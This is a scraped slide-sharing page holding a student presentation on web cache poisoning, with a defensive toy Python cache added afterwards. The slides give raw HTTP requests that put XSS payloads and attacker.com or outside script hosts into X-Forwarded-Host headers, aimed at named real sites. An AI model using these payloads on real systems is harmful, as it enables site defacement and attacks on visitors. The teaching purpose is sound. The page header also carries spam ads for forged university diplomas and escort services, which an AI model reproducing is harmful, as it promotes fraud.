『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Serviceyoung call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhi
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptx
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 

Web Cache Poisoning

  • 2. About Me ● A neophyte ● Web enthusiast ● iAm NoT yEt wORkInG iAm sTiLl sTudiNg (◕‿◕)
  • 3. Overview ● What cache poisoning we are talking about? ● Quickly Recalling Caching ● Case Studies ● Practical Time ● Defense
  • 4. Web Cache Poisoning at a glance Web Cache Poisoning is NOT ● Web Cache Deception ● Browser Cache Poisoning ● Request Smuggling ● Response Splitting ● DNS Cache Poisoning
  • 7. Cache Keys GET /bootstrap.css HTTP/1.1 Host: example.com User-Agent: Chrome/71.0….Linux/4.15 Blah: … ● Cache Keys are used to uniquely identify cached object
  • 8. Unkeyed Inputs and key collison GET /some_page.html HTTP/1.1 Host: example.com User-Agent: Chrome/71.0…. Blah: … Cookie: language=english Blah: .. GET /some_page.html HTTP/1.1 Host: example.com User-Agent: Chrome/71.0…. Blah: … Cookie: language=hindi Blah: ..
  • 9. Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=english Response: Blah… <title>Hello World</title> Blah... Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=hindi Response: Blah… <title>नमस्ते दुननया</title> Blah...
  • 10. Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=english Response: Blah… <title>Hello World</title> Blah... Request: GET /page.html HTTP/1.1 Host: example.com Blah: … Cookie: language=hindi Cached Response: Blah… <title>Hello World</title> Blah...
  • 11. How do we poison caches? ● Using unkeyed inputs like HTTP Headers ● Using Request Smuggling ● Using Response Splitting ➔ This presentation is focused on exploiting using HTTP Headers
  • 12. Approach to web cache poisoning
  • 13. Quick Example On Web Cache Poisoning
  • 14. A normal request Request: GET /login.php HTTP/1.1 Host: 191.168.56.101 Blah: … Response: Blah: ... <img src=”192.168.56.101/image.png” /> Blah...
  • 15. A funny request Request: GET /login.php HTTP/1.1 Host: 192.168.56.101 X-Forwarded-Host: lol“/><svg onload=’alert(1)’> Blah: ... Response: Blah: … <img src=”lol"/><svg onload='alert(1)'>/image.png” />
  • 16. We all like practicals, don’t we?
  • 18. Cached XSSed Response in redhat.com GET /en?dontpoisoneveryone=1 HTTP/1.1 Host: www.redhat.com X-Forwarded-Host: a."><script>alert(1)</script> HTTP/1.1 200 OK Cache-Control: public, no-cache Blah… <meta property="og:image" content="https://a."><script>alert(1)</script>"/>
  • 19. Discreet Poisoning ● We just poisoned the cache for https://redhat.com/en?dontpoisoneveryone=1 ● We need to be first to send the request whenever this cache expires in order to poison site’s legitimate users. ● We need to reverse engineer cache expiry system and crawl into documentation to figure out exact time the cached object will be expired.
  • 20. unity3d.com Request: GET / HTTP/1.1 Host: unity3d.com X-Host: portswigger-labs.net HTTP/1.1 200 OK Via: 1.1 varnish-v4 Age: 174 Cache-Control: public, max-age=1800 … <script src="https://portswigger- labs.net/sites/files/foo.js"></script>
  • 21. Selective Poisoning GET / HTTP/1.1 Host: redacted.com User-Agent: Mozilla/5.0 … Firefox/60.0 X-Forwarded-Host: a"><iframe onload=alert(1)> HTTP/1.1 200 OK X-Served-By: cache-lhr6335-LHR Vary: User-Agent, Accept-Encoding … <link rel="canonical" href="https://a">a<iframe onload=alert(1)> </iframe>
  • 22. DOM poisoning
      Request:
      GET /dataset HTTP/1.1
      Host: catalog.data.gov
      X-Forwarded-Host: canary
      Response:
      HTTP/1.1 200 OK
      Age: 32707
      X-Cache: Hit from cloudfront
      …
      <body data-site-root="https://canary/">
  • 23. Request:
      GET /dataset HTTP/1.1
      Host: catalog.data.gov
      X-Forwarded-Host: id.burpcollaborator.net
      Response:
      HTTP/1.1 200 OK
      Age: 32707
      X-Cache: Hit from cloudfront
      …
      <body data-site-root="https://id.burpcollaborator.net/">
  • 24. Request:
      GET /api/i18n/es HTTP/1.1
      Host: catalog.data.gov
      Response:
      HTTP/1.1 200 OK
      …
      {"Show more":"Mostrar más"}
  • 25. Request:
      GET /api/i18n/es HTTP/1.1
      Host: portswigger-labs.net
      Response:
      HTTP/1.1 200 OK
      …
      {"Show more":"<svg onload=alert(1)>"}
  • 26. Mozilla SHIELD
      ● A cool feature to install addons in the background for marketing purposes
      ● This feature became famous for forcefully installing the Mr. Robot extension in the background
      ● They were using Nginx for caching
      ● Mozilla sent a weird request which contained an Origin header in all lowercase:
      GET /api/v1/recipe/signed/ HTTP/1.1
      Blah: ...
      origin: null
      Blah: ...
  • 27. Request:
      GET /api/v1/ HTTP/1.1
      Host: normandy.cdn.mozilla.net
      X-Forwarded-Host: xyz.burpcollaborator.net

      HTTP/1.1 200 OK
      {
        ...
        "recipe-list": "https://xyz.burpcollaborator.net/api/v1/recipe/",
        "recipe-signed": "https://xyz.burpcollaborator.net/api/v1/recipe/signed/",
        ...
      }
  • 28. ● Recipes were signed, so we couldn't install an addon of our choice
      ● Backend Mozilla systems that use unsigned recipes let us peek into the system and might help us obtain the signing key
      ● But we could still perform a DDoS
      ● We could install already signed addons
  • 29. Route poisoning in goodhire.com
      ● Some applications dumbly use request headers to generate URLs and then use those URLs for routing :)
      ● goodhire.com is hosted on hubspot.com, which sits behind Cloudflare's caching servers.
  • 30. Route poisoning in goodhire.com
      Request:
      GET / HTTP/1.1
      Host: www.goodhire.com
      X-Forwarded-Server: canary
      Response:
      HTTP/1.1 404 Not Found
      CF-Cache-Status: MISS
      ...
      <title>HubSpot - Page not found</title>
      <p>The domain canary does not exist in our system.</p>
  • 31. Request:
      GET / HTTP/1.1
      Host: www.goodhire.com
      X-Forwarded-Host: portswigger-labs-4223616.hs-sites.com
      Response:
      HTTP/1.1 200 OK
      ...
      <script>alert(document.domain)</script>
  • 32. Hidden route poisoning
      ● This vulnerability was in blog.cloudflare.com, which was using Cloudflare's own caching service
      ● blog.cloudflare.com is hosted using Ghost.
  • 33. A normal fail response
      Request:
      GET / HTTP/1.1
      Host: blog.cloudflare.com
      X-Forwarded-Host: canary
      Response:
      HTTP/1.1 302 Found
      Location: https://ghost.org/fail/
  • 34. Supplying an already hosted website
      Request:
      GET / HTTP/1.1
      Host: blog.cloudflare.com
      X-Forwarded-Host: blog.binary.com
      Response:
      HTTP/1.1 200 OK
      Normal response
      Still no luck :(
  • 35. B...bu….but what if we use a website hosted on Ghost?
      Request:
      GET / HTTP/1.1
      Host: blog.cloudflare.com
      X-Forwarded-Host: noshandnibble.ghost.io
      Response:
      HTTP/1.1 302 Found
      Location: http://noshandnibble.blog/
  • 36. How much damage can we do with it?
      ● Files that were cached:
        a. jpg
        b. png
        c. pdf
        d. js
        e. css
  • 37. Bypassing mixed-content protection
      ● Mixed content is when your website is served over HTTPS but requests some resource over HTTP.
      ● Browsers block this kind of import; the feature is called mixed-content protection.
      ● The redirect Ghost issued was to HTTP rather than HTTPS, which was a big obstacle. Again stuck :/
  • 38. Luckily, bounty hunters helped
      ● Safari's HSTS redirect automatically upgrades it to HTTPS
      ● HSTS is a technique used to prevent data from being eavesdropped on by upgrading connections from HTTP to HTTPS.
      ● Edge's handling of the 302 response completely bypasses mixed-content protection
  • 39. Chaining unkeyed inputs
      ● Sometimes an unkeyed input only confuses one part of the application.
      ● We then need to chain unkeyed inputs in order to get something useful
  • 40. Request 1
      Request:
      GET /en HTTP/1.1
      Host: redacted.net
      X-Forwarded-Host: xyz
      Response:
      HTTP/1.1 200 OK
      Set-Cookie: locale=en; domain=xyz
  • 41. Request 2
      Request:
      GET /en HTTP/1.1
      Host: redacted.net
      X-Forwarded-Scheme: nothttps
      Response:
      HTTP/1.1 301 Moved Permanently
      Location: https://redacted.net/en
  • 42. Request 1 + Request 2 = WCP
      Request:
      GET /en HTTP/1.1
      Host: redacted.net
      X-Forwarded-Host: attacker.com
      X-Forwarded-Scheme: nothttps
      Response:
      HTTP/1.1 301 Moved Permanently
      Location: https://attacker.com/en
  • 43. Open Graph hijacking
      ● Here's everyone's favourite, Facebook hacking!
      ● Open Graph is a protocol developed by Facebook which allows Facebook and other apps to integrate with each other.
      ● But what if we cache a malicious page which in turn shares what we want it to share? Let's try it out.
  • 44. Request:
      GET /en HTTP/1.1
      Host: redacted.net
      X-Forwarded-Host: attacker.com
      Response:
      HTTP/1.1 200 OK
      Cache-Control: max-age=0, private, must-revalidate
      …
      <meta property="og:url" content='https://attacker.com/en'/>
  • 46. Defense
      ● Do NOT use caching at all!
      ● Avoid taking input from headers.
      ● If you do, include those headers in the cache key.
      ● Use Burp's active scanner or tools like Param Miner to find unkeyed inputs.
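A toy shared cache, added here as an example (not code from the original presentation), that reproduces the unkeyed-input collision from slides 10, 11, 14 and 15 and then checks the two fixes from the Defense slide: with X-Forwarded-Host left out of the key a plain visitor is served the first requester's canary URL, while either keying on that header or having the origin ignore it stops the collision. The hosts, handlers and function names are constructed stand-ins.

```python
# Added example (not code from the presentation): a toy reverse-proxy cache
# reproducing the unkeyed-input collision from the slides and the two fixes
# from the Defense slide. Hosts, paths and handlers are constructed stand-ins.
from typing import Callable, Dict, Tuple

Request = Dict[str, str]  # "path", "Host" and any other header as plain strings
KeyFn = Callable[[Request], Tuple[str, ...]]
OriginFn = Callable[[Request], str]

def origin(req: Request) -> str:
    """Constructed origin: like slides 14-15, it builds an absolute <img> URL
    from X-Forwarded-Host and falls back to Host only when it is absent."""
    host = req.get("X-Forwarded-Host", req["Host"])
    return f'<img src="https://{host}/image.png" />'

def hardened_origin(req: Request) -> str:
    """Defence 'avoid taking input from headers': X-Forwarded-Host is ignored."""
    return f'<img src="https://{req["Host"]}/image.png" />'

def weak_key(req: Request) -> Tuple[str, ...]:
    """Keyed on Host and path only, so X-Forwarded-Host is an unkeyed input."""
    return (req["Host"], req["path"])

def safe_key(req: Request) -> Tuple[str, ...]:
    """Defence 'include them in the cache key': every header the origin reads
    joins the key, so two requests that differ in it can no longer collide."""
    return (req["Host"], req["path"], req.get("X-Forwarded-Host", ""))

class Cache:
    """Shared cache: the first body stored under a key is replayed to every
    later request that maps to that same key."""
    def __init__(self, key_fn: KeyFn, origin_fn: OriginFn) -> None:
        self.key_fn, self.origin_fn, self.store = key_fn, origin_fn, {}

    def fetch(self, req: Request) -> str:
        key = self.key_fn(req)
        if key not in self.store:  # miss: forward to the origin and store
            self.store[key] = self.origin_fn(req)
        return self.store[key]  # hit: serve the stored body unchanged

def what_a_visitor_sees(key_fn: KeyFn, origin_fn: OriginFn) -> str:
    """A request carrying 'X-Forwarded-Host: canary' is followed by a plain
    visitor's request; returns the body the plain visitor is served."""
    cache = Cache(key_fn, origin_fn)
    cache.fetch({"path": "/login.php", "Host": "192.168.56.101",
                 "X-Forwarded-Host": "canary"})
    return cache.fetch({"path": "/login.php", "Host": "192.168.56.101"})
```

Swapping `weak_key` for `safe_key`, or `origin` for `hardened_origin`, is enough to make the plain visitor receive an image URL built from their own Host header again.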
  • 47. Thanks
      ● Connect with me
        ○ kuldeep.pandya.77799@Facebook
        ○ some_dank_boi@Instagram
        ○ Predator77799@Twitter